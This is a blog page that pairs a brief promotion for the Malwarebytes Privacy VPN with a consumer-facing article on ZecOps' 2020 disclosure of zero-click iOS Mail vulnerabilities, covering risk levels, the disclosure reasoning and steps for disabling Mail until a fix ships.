Every time you go online, corporations, advertisers, and hackers are trying to eavesdrop on you. In a world that is more connected than ever before, having a VPN is like having your own personal Internet connection. By using a VPN, you can present an IP address from a location of your choice, masking your true IP address and hiding your online activity from those who try to profit from it.

Malwarebytes Privacy streamlines this process down to a single click. Its intuitive interface shows the most important information about your Internet connection in an easy-to-read dashboard, such as:

  • Whether the VPN is on or off
  • Which server location is selected
  • Your actual IP address vs. the IP address being displayed
The Malwarebytes Privacy GUI

Using best-in-class encryption, Malwarebytes Privacy also helps protect your personal information from cybercriminals—without collecting any of your browsing or online activity data itself. As an added bonus, with over 180 servers in more than 30 countries, our VPN offers users the potential to view different, localized content around the Internet.

How to get Malwarebytes Privacy

The Malwarebytes Privacy user guide covers the basics of the program and can be found on our support pages. There you can find out how to download and install our VPN, activate the program, connect to a private server, and other functions. You can also configure program settings, check your account details, and seek in-app help.

For more information about Malwarebytes Privacy, take a look at our dedicated webpage for the VPN.

Stay safe and stay private, everyone!


iOS Mail bug allows remote zero-click attacks

Wed, 04/22/2020 - 17:54

On Monday, ZecOps released a report about a couple of concerning vulnerabilities in the Mail app in iOS. These vulnerabilities would allow an attacker to execute arbitrary code in the Mail app or the maild process that assists the Mail app behind the scenes. Most concerning, though, is the fact that even the most current version of iOS, 13.4.1, is vulnerable.

The way the attack works is that the threat actor sends an email message designed to trigger a buffer overflow in Mail (or maild). A buffer overflow is a bug in code that lets a program write more data into a block of memory than that block can hold. The excess spills into adjacent memory and corrupts whatever lives there, such as other data or pointers the process relies on; an attacker who controls what gets written can use that corruption to steer the vulnerable process into running code of their choosing.

The bad news

The vulnerabilities disclosed by ZecOps would allow an attacker to use such a buffer overflow to attack an iOS device remotely, on devices running iOS 6 through iOS 13.4.1. (ZecOps writes that it may work on even older versions of iOS, but they did not test that.)

On iOS 12, the attack requires nothing more than viewing a malicious email message in the Mail app. It would not require tapping a link or any other content within the message. On iOS 13, the situation is worse, as the attack can be carried out against the maild process in the background, without requiring any user interaction (i.e., it is a “zero-click” vulnerability).

In the case of infection on iOS 13, there would be no significant sign of infection, other than temporary slowness of the Mail app. In some cases, evidence of a failed attack may be present in the form of messages that have no content and cannot be displayed.

The messages—shown in the image above from the ZecOps blog—may be visible for a limited time. Once an attack is successful, the attacker would presumably use access to the Mail app to delete these messages, so the user may never see them.

The good news

I know how this sounds. This is an attack that can be carried out by any threat actor who has your email address, on the latest version of iOS, and the infection happens in the background without requiring action from the user. How is there good news here?!

Fortunately, there is. The vulnerabilities revealed by ZecOps only allow an attack of the Mail app itself. Using those vulnerabilities, an attacker would be able to capture your email messages, as well as modify and delete messages. Presumably the attacker would also be able to conduct other normal Mail operations, such as sending messages from your email address, although this was not mentioned. While this isn’t exactly comforting, it falls far short of compromising the entire device.

In order to achieve a full device compromise, the attacker would need to have another vulnerability. This means that if you have version 13.4.1, it would require a publicly unknown vulnerability, which would for the most part restrict such an attack to a nation-state-level adversary.

In other words, someone would have to be willing to risk burning a zero-day vulnerability, worth potentially a million dollars or more, to infect your phone. This means that you’re unlikely to be infected unless some hostile government or other powerful group is interested in spying on you.

If you are, for example, a human rights advocate working against a repressive regime, or a member of an oppressed minority in such a country, you may be a target. Similarly, if you are a journalist covering such news, you may be a target. You could also be at risk if you are an important business person, such as a CEO or CFO at a major corporation, or hold an important role in the government. The average person will not be at significant risk from this kind of attack.

Why disclose now?

It is common practice as part of “responsible disclosure” to avoid public mention of a major vulnerability until after it has been fixed, or until sufficient time has passed that it is believed the software or hardware vendor does not intend to fix the vulnerability in a timely fashion. Release of this kind of information before a fix is available can lead to increased danger to users, as hackers who learn that a vulnerability exists can find it for themselves.

Of course, this must be balanced against the risk of existing attacks that are going undetected. Disclosure can help people who are under active attack to discover the problem, and can help people who are not yet under attack learn how to prevent an attack.

With this in mind, ZecOps mentioned three reasons why they chose to disclose now:

  1. Since the disclosed vulnerabilities can’t be used to compromise the entire device without additional vulnerabilities, the risk of disclosure is lower.
  2. Apple has released a beta of iOS 13.4.5, which addresses the issue. Although a fix in beta is not exactly the same as a fix in a public release, the changes in the beta could be analyzed by an attacker, which would lead to discovery of the vulnerabilities. Essentially, the vulnerabilities have been disclosed to malicious hackers already, but the public was unaware.
  3. At least six organizations were under active attack using these vulnerabilities. (The organizations were not named.)
What you should do

First, don’t panic. As mentioned, this is not a widespread attack against everyone using an iPhone. There have been other zero-click vulnerabilities used to push malware onto iPhones in the past, yet none have ever been widespread. This is because the more widespread such an attack becomes, the more likely it is to be spotted, and subsequently fixed by Apple.

To protect their investment in million-dollar iOS zero-day vulnerabilities, powerful organizations use those vulnerabilities sparingly, only against targeted individuals or groups. Thus, unless you’re someone who might be targeted by a hostile nation or other powerful organization, you’re not likely to be in danger.

However, the risk does increase following disclosure, as malicious hackers can discover and use the vulnerability to attack Mail, at least. So you shouldn’t ignore the risk, either.

As much as I’d like to say, “Install Malwarebytes, run a scan, and remove the malware,” I can’t. Unlike macOS, installing antivirus software isn’t possible on iOS, due to Apple restrictions. So there is no software that can scan an iPhone or iPad for malware.

This, plus the lack of noticeable symptoms, means that it will be difficult to determine whether you’ve been affected. As always with iOS, if you have reason to believe you’ve been infected, your only option is to reset your device to factory state and set it up again from scratch as if it were a new device.

As for precautions to avoid infection, there are a couple things you can do. One would be to install the iOS 13.4.5 beta, which contains a fix for the bug. This is not something that’s easy to do, however, as you need an Apple developer account to download the beta. Plus, using a beta version of iOS, which may have bugs, isn’t recommended for all users.

The other possible security measure would be to disable Mail until the next version of iOS is released publicly. To do so, open the Settings app and scroll down to Passwords & Accounts. Tap that, then look at the list of accounts.

You may have multiple accounts, as shown above, or only one. For any accounts that say “Mail” underneath, that means that you’re using Mail to download mail for that account. Tap on each account, and on the next screen, look for the Mail toggle.

The image above shows that Mail is enabled. Toggle the switch to off. Do this for each of your accounts, and do not switch Mail back on again until you’ve updated to a version of iOS newer than 13.4.1.

Stay safe, everyone!
